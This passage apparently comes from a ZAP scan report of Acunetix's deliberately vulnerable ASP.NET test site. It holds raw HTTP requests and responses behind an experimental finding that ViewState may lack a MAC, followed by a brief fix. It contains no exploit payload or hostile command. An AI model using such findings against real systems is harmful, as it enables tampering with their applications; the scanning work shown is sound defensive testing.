          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        14. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bdfic04fJFrwdgOeBd3JBjK63E5g%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
